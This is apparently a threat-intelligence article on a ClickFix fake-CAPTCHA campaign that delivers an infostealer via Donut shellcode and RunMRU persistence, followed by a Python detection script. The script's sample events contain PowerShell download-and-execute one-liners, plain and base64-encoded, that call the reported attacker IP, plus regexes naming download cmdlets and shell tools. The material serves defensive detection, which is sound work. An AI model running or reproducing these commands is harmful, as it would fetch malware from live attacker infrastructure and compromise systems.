A new malware campaign has surfaced that uses phony CAPTCHA lures to trick users into running a malicious script that installs a covert data thief. This activity, discovered in early 2026, shows notable behavioral similarities to the ClickFix campaign that targeted restaurant reservation systems in July 2025.

To get around conventional security controls and obtain initial access to victim systems, the operators have refined their social engineering. The attack starts when a user visits a compromised website that displays a fake CAPTCHA verification page. The page silently copies a malicious PowerShell command to the victim's clipboard and then instructs them to paste and run it themselves. This "ClickFix" method relies on human interaction to sidestep automated security sandboxes, which typically inspect downloaded files rather than commands a user types by hand.

Figure: Data from the clipboard (Source: Cyber Proof)

The command downloads the next stage from 91.92.240.219, an IP address in the attacker's infrastructure. Before continuing, the malware uses specific API calls to read the clipboard and confirm that the user actually carried out the paste. Once executed, the script starts a multi-stage infection process intended to steal confidential information.

The malware targets a wide range of applications, including enterprise VPN configurations, cryptocurrency wallets such as MetaMask, and more than 25 web browsers. According to Cyber Proof analysts, the campaign checks for virtual environments and active security tools before exfiltrating anything. The impact is severe: the attackers obtain financial assets and critical credentials, which they can monetize directly or use to gain further access to corporate networks.

Process Injection and Persistence

To remain undetected on compromised devices, the malware uses process injection. After the initial PowerShell execution, it downloads a position-independent shellcode file named cptch.bin from the attacker's infrastructure. Analysts also noticed an operational security slip: Microsoft Defender flagged the attacker's use of the variable $finalPayload.

Figure: Loading of cptch.bin (Source: Cyber Proof)

The shellcode was generated with the Donut framework, which lets the payload run directly in memory. To conceal its activity, the shellcode uses common Windows APIs such as VirtualAlloc to allocate memory inside benign processes like svchost.exe. To survive reboots, the attackers modify the RunMRU registry key, which is where the Windows Run dialog stores its command history; the pasted command therefore also leaves a forensic trace there. This change causes the machine to run the malicious PowerShell command again, restarting the payload download.

Figure: RUNMRU key persistence (Source: Cyber Proof)

This persistence mechanism gives the actors long-term access. To defeat hash-based blocking, they also rotate payload filenames, for example cptchbuild.bin, so detections keyed to a single file hash or name do not hold up.

Organizations should make users aware of the danger of running commands copied from web pages. Security teams should monitor for the registry changes described above and for unusual PowerShell execution, in particular PowerShell spawned by explorer.exe, which is what a command pasted into the Run dialog produces. Endpoint detection rules that flag clipboard reads by browser processes can also help catch this attack early.
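As an added example, not part of the Cyber Proof report or this article, the following Python shows how a detection team might express the checks from the persistence and detection sections above over constructed process-creation and registry-set events modelled loosely on Sysmon fields. The sample lines, SID, paths and the base64 command are made up for illustration; only the IP address and the cptch*.bin names come from the article. The script decodes -EncodedCommand arguments before inspecting them, flags PowerShell launched from explorer.exe with download-and-execute cmdlets, matches the payload name as a pattern rather than a hash so the cptchbuild.bin rotation still hits, and flags RunMRU entries whose data is a shell command.

```python
import base64
import re

# Constructed stage-two command of the kind ClickFix lures paste into the Run
# dialog; the host is the address reported in the article. Encoded the way
# PowerShell's -EncodedCommand expects it (base64 over UTF-16LE).
STAGE_COMMAND = "iex (iwr http://91.92.240.219/cptch.bin -UseBasicParsing)"
ENCODED_STAGE = base64.b64encode(STAGE_COMMAND.encode("utf-16-le")).decode()

# Constructed sample telemetry modelled loosely on Sysmon fields
# (EventID 1 = process creation, EventID 13 = registry value set).
# Paths, SID and command lines are made up; they are not Cyber Proof's data.
SAMPLE_EVENTS = [
    # benign: PowerShell started from an interactive console
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine="powershell Get-Process"',
    # ClickFix: explorer.exe (the Run dialog) launches a hidden PowerShell downloader
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="powershell -w hidden -c iex (iwr http://91.92.240.219/cptchbuild.bin)"',
    # same stage, but the command is passed base64-encoded
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="powershell -w hidden -enc ' + ENCODED_STAGE + '"',
    # RunMRU value set to a shell command (Run-dialog history entries end in \1)
    'EventID=13 TargetObject=HKU\\S-1-5-21-1000\\Software\\Microsoft\\Windows\\'
    'CurrentVersion\\Explorer\\RunMRU\\a '
    'Details="powershell -w hidden -c iex (iwr http://91.92.240.219/cptch.bin)\\1"',
    # benign RunMRU entry
    'EventID=13 TargetObject=HKU\\S-1-5-21-1000\\Software\\Microsoft\\Windows\\'
    'CurrentVersion\\Explorer\\RunMRU\\b Details="notepad\\1"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
ENC_FLAG_RE = re.compile(r'(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)')
DOWNLOAD_EXEC_RE = re.compile(
    r'(?i)\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|'
    r'iex|invoke-expression|get-clipboard)\b')
PAYLOAD_NAME_RE = re.compile(r'(?i)\bcptch\w*\.bin\b')  # cptch.bin, cptchbuild.bin, ...
RUNMRU_RE = re.compile(r'(?i)\\Explorer\\RunMRU\\')
SHELL_RE = re.compile(r'(?i)\b(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)\b')
C2_IP = "91.92.240.219"  # reported in the article


def parse_event(line):
    """Parse a key=value event line (values may be double-quoted) into a dict."""
    return {key: quoted if quoted else bare for key, quoted, bare in FIELD_RE.findall(line)}


def decode_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    same content rules can run over it; returns the input unchanged if absent."""
    match = ENC_FLAG_RE.search(cmdline)
    if not match:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def analyse_event(fields):
    """Return a list of (rule_name, evidence) tuples for one parsed event."""
    findings = []
    if fields.get("EventID") == "1":
        image = fields.get("Image", "").lower()
        parent = fields.get("ParentImage", "").lower()
        cmd = decode_encoded_command(fields.get("CommandLine", ""))
        if image.endswith(("powershell.exe", "pwsh.exe")):
            # Run-dialog paste: explorer.exe is the parent of the pasted command
            if parent.endswith("explorer.exe") and DOWNLOAD_EXEC_RE.search(cmd):
                findings.append(("clickfix_run_dialog_powershell", cmd))
            if C2_IP in cmd:
                findings.append(("known_c2_address", C2_IP))
            name = PAYLOAD_NAME_RE.search(cmd)
            if name:
                findings.append(("rotating_payload_name", name.group(0)))
    elif fields.get("EventID") == "13":
        target = fields.get("TargetObject", "")
        details = fields.get("Details", "")
        if RUNMRU_RE.search(target) and SHELL_RE.search(details):
            findings.append(("runmru_command_persistence", details))
    return findings


def scan(lines):
    """Run every rule over every line; returns (line_number, rule, evidence) tuples."""
    return [(n, rule, ev) for n, line in enumerate(lines, 1)
            for rule, ev in analyse_event(parse_event(line))]


if __name__ == "__main__":
    for n, rule, evidence in scan(SAMPLE_EVENTS):
        print(f"event {n}: {rule}: {evidence}")
```

The parent-process check is what separates the ClickFix stage from ordinary administrative PowerShell; the encoded-command decode matters because the same downloader arrives both as plain text and base64, and matching the IP and a cptch*.bin name pattern instead of a file hash is what keeps the rule useful once the operators rotate to the next filename.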